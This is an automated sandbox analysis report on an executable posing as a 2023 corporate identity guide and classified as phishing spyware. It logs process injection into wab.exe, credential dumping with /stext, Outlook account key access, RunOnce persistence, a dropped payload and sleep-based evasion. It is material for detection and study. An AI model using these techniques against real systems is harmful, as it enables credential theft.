              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405461

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000001.00000003.1382395875.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.5950608330.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8800, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: DHRI_kurumsal_kimlik_rehberi-2023.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_00404C9E0_2_00404C9E
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_00406B150_2_00406B15
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_004072EC0_2_004072EC
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_704D1B5F0_2_704D1B5F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371D71941_2_371D7194
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371CB5C11_2_371CB5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00406E8F4_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044B0404_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0043610D4_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004473104_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044A4904_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040755A4_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0043C5604_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044B6104_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044D6C04_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004476F04_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044B8704_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044081D4_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004149574_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004079EE4_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00407AEB4_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044AA804_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00412AA94_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00404B744_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00404B034_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044BBD84_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00404BE54_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00404C764_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00415CFE4_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00416D724_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00446D304_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00446D8B4_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0040D0445_2_0040D044
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004050385_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004050A95_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0040511A5_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004051AB5_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004382F35_2_004382F3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004305755_2_00430575
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0043B6715_2_0043B671
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0041F6CD5_2_0041F6CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004119CF5_2_004119CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00439B115_2_00439B11
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00438E545_2_00438E54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00412F675_2_00412F67
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0043CF185_2_0043CF18
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004050C26_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004014AB6_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004051336_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004051A46_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004012466_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0040CA466_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004052356_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004032C86_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004016896_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00402F606_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00412968 appears 78 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00421A32 appears 43 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044407A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00401806 NtdllDefWindowProc_W,4_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004018C0 NtdllDefWindowProc_W,4_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004016FC NtdllDefWindowProc_A,5_2_004016FC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004017B6 NtdllDefWindowProc_A,5_2_004017B6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00402CAC NtdllDefWindowProc_A,6_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00402D66 NtdllDefWindowProc_A,6_2_00402D66
              Source: DHRI_kurumsal_kimlik_rehberi-2023.exeStatic PE information: Resource name: RT_VERSION type: VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79
              Source: Retarded.exe.1.drStatic PE information: Resource name: RT_VERSION type: VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 6%
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: edgegdi.dllJump to behavior
              Source: DHRI_kurumsal_kimlik_rehberi-2023.exeVirustotal: Detection: 38%
              Source: DHRI_kurumsal_kimlik_rehberi-2023.exeReversingLabs: Detection: 26%
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeFile read: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeJump to behavior
              Source: DHRI_kurumsal_kimlik_rehberi-2023.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_5-33003
              Source: unknownProcess created: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\edvlu
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\pxbdutmxl
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rrgwvlxrzapp
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\System32\backgroundTaskHost.exe "C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\edvluJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\pxbdutmxlJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rrgwvlxrzappJump to behavior
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,6_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\json[1].jsonJump to behavior
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeFile created: C:\Users\user\AppData\Local\Temp\nso5D68.tmpJump to behavior
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@10/30@3/3
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404722
              Source: wab.exe, wab.exe, 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000001.00000002.5979154797.0000000037100000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, wab.exe, 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,4_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,4_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\ourvbpld-RBN2WW
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,4_2_0040B58D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: DHRI_kurumsal_kimlik_rehberi-2023.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000000.00000002.1126111595.000000000555D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1125447769.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHRI_kurumsal_kimlik_rehberi-2023.exe PID: 8680, type: MEMORYSTR
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371C2806 push ecx; ret 1_2_371C2819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044693D push ecx; ret 4_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044DB70 push eax; ret 4_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044DB70 push eax; ret 4_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00451D54 push eax; ret 4_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00444355 push ecx; ret 5_2_00444365
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004446D0 push eax; ret 5_2_004446E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004446D0 push eax; ret 5_2_0044470C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0044AC84 push eax; ret 5_2_0044AC91
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00414060 push eax; ret 6_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00414060 push eax; ret 6_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00414039 push ecx; ret 6_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004164EB push 0000006Ah; retf 6_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00416553 push 0000006Ah; retf 6_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00416555 push 0000006Ah; retf 6_2_004165C4
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_704D1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_704D1B5F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exeJump to dropped file
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeFile created: C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp\System.dllJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AnfgtendesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AnfgtendesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AnfgtendesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AnfgtendesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_004047C6
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 9144Thread sleep count: 3608 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 9156Thread sleep count: 72 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 9156Thread sleep time: -36000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 9160Thread sleep count: 5358 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 9160Thread sleep time: -16074000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 3608 delay: -5Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3608Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5358Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1743Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.7 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00418981 memset,GetSystemInfo,4_2_00418981
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_371C10F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371C6580 FindFirstFileExA,1_2_371C6580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,4_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407898
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeAPI call chain: ExitProcess graph end nodegraph_0-4324
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeAPI call chain: ExitProcess graph end nodegraph_0-4321
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_5-33897
              Source: wab.exe, 00000001.00000002.5949539890.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.5950608330.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1382395875.0000000000B2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wab.exe, 00000001.00000002.5950608330.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1382395875.0000000000B2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWj{^y
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371C2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_371C2639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
